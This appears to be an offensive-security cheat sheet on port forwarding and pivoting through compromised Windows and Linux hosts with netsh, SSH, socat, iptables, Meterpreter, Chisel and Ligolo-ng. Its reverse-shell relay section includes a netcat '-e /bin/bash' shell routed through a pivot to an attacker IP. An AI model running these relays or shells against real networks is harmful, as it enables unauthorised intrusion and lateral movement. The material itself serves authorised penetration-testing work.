Port Forwarding

Forward network traffic from one port to another to access internal services through compromised hosts.
Essential for accessing services on internal networks that are not directly reachable from the attacker machine.

Windows Port Forwarding

Netsh (Native Windows)

Add Port Forward

# Forward local port 8080 to remote host
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.5.10

# Forward specific interface
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=10.10.10.10 connectport=3389 connectaddress=172.16.5.20

List Port Forwards

netsh interface portproxy show all
netsh interface portproxy show v4tov4

Delete Port Forward

# Delete specific forward
netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0

# Delete all forwards
netsh interface portproxy reset

Firewall Rules for Port Forward

# Allow inbound traffic on forwarded port
netsh advfirewall firewall add rule name="Port Forward 8080" protocol=TCP dir=in localport=8080 action=allow

Local Port Forward

# Forward local 3389 to remote RDP
plink.exe -L 3389:172.16.5.10:3389 user@10.10.10.10 -pw password

# Background process
plink.exe -N -L 3389:172.16.5.10:3389 user@10.10.10.10 -pw password

Remote Port Forward

# Forward remote 8080 to local 80
plink.exe -R 8080:127.0.0.1:80 user@10.10.10.10 -pw password

Dynamic Port Forward (SOCKS)

# Create SOCKS proxy
plink.exe -D 1080 user@10.10.10.10 -pw password

SSH (Windows 10+)

Local Port Forward

# Forward local 8080 to remote 80
ssh -L 8080:172.16.5.10:80 user@10.10.10.10

# Multiple forwards
ssh -L 8080:172.16.5.10:80 -L 3389:172.16.5.20:3389 user@10.10.10.10

Remote Port Forward

# Forward remote 4444 to local 4444
ssh -R 4444:127.0.0.1:4444 user@10.10.10.10

Dynamic Port Forward

# Create SOCKS proxy
ssh -D 1080 user@10.10.10.10

Linux Port Forwarding

SSH Port Forwarding

Local Port Forward

# Forward local 8080 to remote service
ssh -L 8080:172.16.5.10:80 user@10.10.10.10

# Bind to all interfaces
ssh -L 0.0.0.0:8080:172.16.5.10:80 user@10.10.10.10

# Multiple forwards
ssh -L 8080:172.16.5.10:80 -L 3389:172.16.5.20:3389 user@10.10.10.10

# Background process
ssh -f -N -L 8080:172.16.5.10:80 user@10.10.10.10

Remote Port Forward

# Forward remote 8080 to local 80
ssh -R 8080:127.0.0.1:80 user@10.10.10.10

# Bind to all interfaces on remote
ssh -R 0.0.0.0:8080:127.0.0.1:80 user@10.10.10.10

# Background process
ssh -f -N -R 8080:127.0.0.1:80 user@10.10.10.10

Dynamic Port Forward (SOCKS)

# Create SOCKS proxy on port 1080
ssh -D 1080 user@10.10.10.10

# Bind to all interfaces
ssh -D 0.0.0.0:1080 user@10.10.10.10

# Background process
ssh -f -N -D 1080 user@10.10.10.10

Socat

Basic Port Forward

# Forward port 8080 to remote service
socat TCP-LISTEN:8080,fork TCP:172.16.5.10:80

# Bind to specific interface
socat TCP-LISTEN:8080,bind=10.10.10.10,fork TCP:172.16.5.10:80

Reverse Shell Relay

# On pivot host - relay to attacker
socat TCP-LISTEN:4444,fork TCP:10.10.14.5:4444

# On attacker
nc -lvnp 4444

# On internal target
nc 172.16.5.10 4444 -e /bin/bash

Encrypted Port Forward

# Generate certificate
openssl req -newkey rsa:2048 -nodes -keyout server.key -x509 -days 365 -out server.crt
cat server.key server.crt > server.pem

# Server (encrypted listener)
socat OPENSSL-LISTEN:443,cert=server.pem,verify=0,fork TCP:172.16.5.10:80

# Client
socat TCP-LISTEN:8080,fork OPENSSL:10.10.10.10:443,verify=0

IPTables

Port Forward with IPTables

# Enable IP forwarding
echo 1 > /proc/sys/net/ipv4/ip_forward
sysctl -w net.ipv4.ip_forward=1

# Add PREROUTING rule
iptables -t nat -A PREROUTING -p tcp --dport 8080 -j DNAT --to-destination 172.16.5.10:80

# Add POSTROUTING rule
iptables -t nat -A POSTROUTING -p tcp -d 172.16.5.10 --dport 80 -j MASQUERADE

# List rules
iptables -t nat -L -n -v

# Delete rules
iptables -t nat -D PREROUTING 1
iptables -t nat -D POSTROUTING 1

Rinetd

Configuration

# Install rinetd
apt-get install rinetd

# Edit config
nano /etc/rinetd.conf

# Add forwarding rules
# bindaddress bindport connectaddress connectport
0.0.0.0 8080 172.16.5.10 80
0.0.0.0 3389 172.16.5.20 3389

# Restart service
systemctl restart rinetd

# Check status
systemctl status rinetd

Netcat Relay

Simple Port Forward

# Method 1: Named pipe
mkfifo /tmp/pipe
nc -l -p 8080 < /tmp/pipe | nc 172.16.5.10 80 > /tmp/pipe

# Method 2: Two-way relay script
while true; do nc -l -p 8080 -c "nc 172.16.5.10 80"; done

Metasploit Port Forwarding

Meterpreter Port Forward

Local Port Forward

# Forward local 3389 to remote RDP
meterpreter> portfwd add -l 3389 -p 3389 -r 172.16.5.10

# Forward local 8080 to remote HTTP
meterpreter> portfwd add -l 8080 -p 80 -r 172.16.5.10

# List forwards
meterpreter> portfwd list

# Delete forward
meterpreter> portfwd delete -l 3389

# Delete all forwards
meterpreter> portfwd flush

Reverse Port Forward

# Forward remote port to local service
meterpreter> portfwd add -R -l 8080 -p 80 -L 127.0.0.1

Chisel Port Forwarding

Local Port Forward

# Server on pivot
./chisel server -p 9001

# Client on attacker - forward local 8080 to remote 80
./chisel client 10.10.10.10:9001 8080:172.16.5.10:80

# Access via localhost
curl http://127.0.0.1:8080

Remote Port Forward

# Server on attacker (reverse mode)
./chisel server --reverse -p 1234

# Client on pivot - forward pivot's 8080 to attacker's 9090
./chisel client 10.10.14.5:1234 R:9090:127.0.0.1:8080

# Access on attacker
curl http://127.0.0.1:9090

Ligolo-ng Port Forwarding

Add Listener

# In ligolo-ng session
listener_add --addr 0.0.0.0:8080 --to 172.16.5.10:80 --tcp

# Forward to attacker machine
listener_add --addr 0.0.0.0:1337 --to 10.10.14.5:8000 --tcp

List and Delete Listeners

# List active listeners
listener_list

# Delete listener
listener_del

Common Scenarios

RDP Access Through Pivot

Windows (Netsh)

# On pivot host
netsh interface portproxy add v4tov4 listenport=3389 listenaddress=0.0.0.0 connectport=3389 connectaddress=172.16.5.10

# On attacker
xfreerdp /v:10.10.10.10:3389 /u:administrator /p:password

Linux (SSH)

# On attacker
ssh -L 3389:172.16.5.10:3389 user@10.10.10.10

# Connect to RDP
xfreerdp /v:127.0.0.1:3389 /u:administrator /p:password

Web Service Access

Forward HTTP

# SSH
ssh -L 8080:172.16.5.10:80 user@10.10.10.10

# Access via browser
http://127.0.0.1:8080

Forward HTTPS

# SSH
ssh -L 8443:172.16.5.10:443 user@10.10.10.10

# Access via browser
https://127.0.0.1:8443

Database Access

MySQL

# Forward MySQL port
ssh -L 3306:172.16.5.10:3306 user@10.10.10.10

# Connect to database
mysql -h 127.0.0.1 -u root -p

MSSQL

# Forward MSSQL port
ssh -L 1433:172.16.5.10:1433 user@10.10.10.10

# Connect with mssqlclient
mssqlclient.py sa:password@127.0.0.1

SMB Access

# Forward SMB port
ssh -L 445:172.16.5.10:445 user@10.10.10.10

# Access SMB share
smbclient -L //127.0.0.1 -U administrator

Notes

Netsh Advantages:

  • Native Windows tool
  • No additional software required
  • Persistent across reboots
  • Supports IPv4 and IPv6

Netsh Limitations:

  • Requires administrator privileges
  • Only forwards TCP traffic
  • No encryption
  • Firewall rules may be needed

SSH Port Forwarding:

  • Encrypted by default
  • Supports TCP only
  • Can forward multiple ports
  • Dynamic (SOCKS) and static options
  • Requires SSH access

Socat:

  • Very flexible
  • Supports TCP and UDP
  • Can encrypt traffic
  • Bidirectional relay
  • Single binary

IPTables:

  • Kernel-level forwarding
  • Very fast
  • Requires root access
  • Persistent configuration needed
  • Complex syntax

Tool Selection:

  • Netsh - Windows native, simple setup
  • SSH - Encrypted, cross-platform
  • Socat - Flexible, can encrypt
  • IPTables - Fast, kernel-level
  • Metasploit - Integrated with framework
  • Chisel - Cross-platform, firewall-friendly
  • Ligolo-ng - Fast, feature-rich

Common Pitfalls:

  • Forgetting to allow firewall rules
  • Binding to wrong interface (127.0.0.1 vs 0.0.0.0)
  • Port conflicts
  • Not enabling IP forwarding (Linux)
  • Incorrect port numbers
  • Missing authentication

Performance:

  • IPTables is fastest (kernel-level)
  • SSH adds encryption overhead
  • Socat is efficient
  • Netsh is native and fast
  • Metasploit adds framework overhead

Persistence:

  • Netsh forwards persist across reboots
  • SSH forwards require reconnection
  • IPTables rules need to be saved
  • Rinetd runs as service
  • Socat needs process management

Security Considerations:

  • Port forwards bypass firewall rules
  • Can expose internal services
  • SSH provides encryption
  • Netsh has no encryption
  • Monitor for unauthorized forwards
  • Clean up after engagement

Troubleshooting:

  • Verify port is listening: netstat -an | grep PORT
  • Check firewall rules
  • Test connectivity with telnet/nc
  • Verify IP forwarding enabled (Linux)
  • Check for port conflicts
  • Use verbose mode for debugging
⬆︎TOP